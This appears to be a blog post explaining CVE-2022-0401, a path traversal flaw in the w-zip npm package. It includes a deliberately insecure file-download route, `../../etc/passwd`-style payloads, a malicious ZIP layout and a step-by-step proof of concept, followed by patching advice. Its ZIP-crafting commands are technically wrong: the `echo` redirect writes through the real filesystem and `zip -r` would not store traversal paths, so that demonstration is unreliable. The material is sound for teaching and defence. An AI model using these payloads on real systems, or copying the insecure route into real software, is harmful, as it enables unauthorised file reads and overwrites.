The world of Node.js and npm is packed with handy packages, but sometimes even the best intentions hide dangerous flaws. One such example is the path traversal vulnerability tracked as CVE-2022-0401, affecting the w-zip npm package prior to version 1.0.12. This vulnerability isn't as complex as some, but its simplicity can be a big problem if left unpatched.
## What is Path Traversal?
Path traversal, sometimes called directory traversal, is a type of vulnerability where an attacker tricks an application into accessing or even modifying files anywhere on the server, not just the files the app is meant to work with. This is usually done by sneaking special sequences such as `../` into file paths; each one moves the resolved path up one directory level.
For example, if an app lets users download files by filename and does not properly validate user input:
```javascript
// Dangerous! DO NOT DO THIS
app.get('/download', (req, res) => {
  let fileName = req.query.file;
  res.sendFile('/uploads/' + fileName);
});
```
With that code, an attacker could request `file=../../../../etc/passwd` and get sensitive system files, or even overwrite files.
## The w-zip Package and CVE-2022-0401
w-zip is a Node.js package for unarchiving ZIP files. Before version 1.0.12, w-zip did not sanitize the paths of entries in ZIP files during extraction. This made it possible for a malicious ZIP file to write files outside the intended extraction directory.
## How it Works (Attack Scenario)
Here's the scenario:
- Your app uses w-zip to allow users to upload and extract ZIP archives,
- A user uploads a ZIP containing files with paths like `../../../../etc/passwd` inside it,
### Example Malicious ZIP Structure
```text
evil.zip
│
├── harmless.txt
├── ../../../../important/system_file.txt <-- Problem!
├── ../../../../etc/passwd <-- Very bad!
```
Vulnerable extraction code might look like this:
```javascript
const wzip = require('w-zip');
const fs = require('fs');

// Assume zipFilePath and extractTo are user-controlled
function extractZip(zipFilePath, extractTo) {
  // Vulnerable! w-zip <1.0.12 does not sanitize entry paths
  wzip.unzip(zipFilePath, extractTo, function (err) {
    if (err) {
      console.error('Extraction failed:', err);
    } else {
      console.log('Extraction complete!');
    }
  });
}
// Attacker can upload a ZIP with ../../... entries
```
By putting `../../etc/passwd` in the ZIP, the extraction process will actually write to `/etc/passwd` if permissions allow, which is a huge security risk.
### 1. Craft the ZIP
With the zip command or a script, prepare a malicious ZIP:
```shell
mkdir evil
echo "hacked" > evil/../../../../tmp/hacked.txt
zip -r evil.zip evil/
```
The archive now contains a file that, if extracted naively, will land in `/tmp/hacked.txt`.
### 2. Exploit the Extraction
```javascript
const wzip = require('w-zip');
wzip.unzip('evil.zip', './uploads', function (err) {
  if (!err) {
    console.log('Done!');
  }
});
```
### 3. After Extraction
Check:
```shell
ls /tmp/hacked.txt
```
If the extraction succeeded, that file exists, proving that path traversal worked!
## References
- Advisory for CVE-2022-0401 (Snyk): https://security.snyk.io/vuln/SNYK-JS-WZIP-2411775
- w-zip package: https://www.npmjs.com/package/w-zip
- Common path traversal attacks: https://owasp.org/www-community/attacks/Path_Traversal
## Mitigation and Remediation
**Best fix:**
```shell
npm install w-zip@latest
```
**Alternative:**
- If you must use older code, pre-validate ZIP entry paths before extraction and reject any entries containing sequences like `../`, or absolute paths.

Don't ever extract untrusted ZIP files without proper sanitization!
## Final Notes
Path traversal is a classic yet dangerous security mistake. With CVE-2022-0401, you see how just a couple of lines of unchecked code can leave a whole system exposed. Always keep dependencies up to date and treat all user input, including uploaded ZIP files, as potentially hostile.
Stay safe, and patch early!
## Timeline
Published on: 02/01/2022 13:15:00 UTC
Last modified on: 02/04/2022 20:51:00 UTC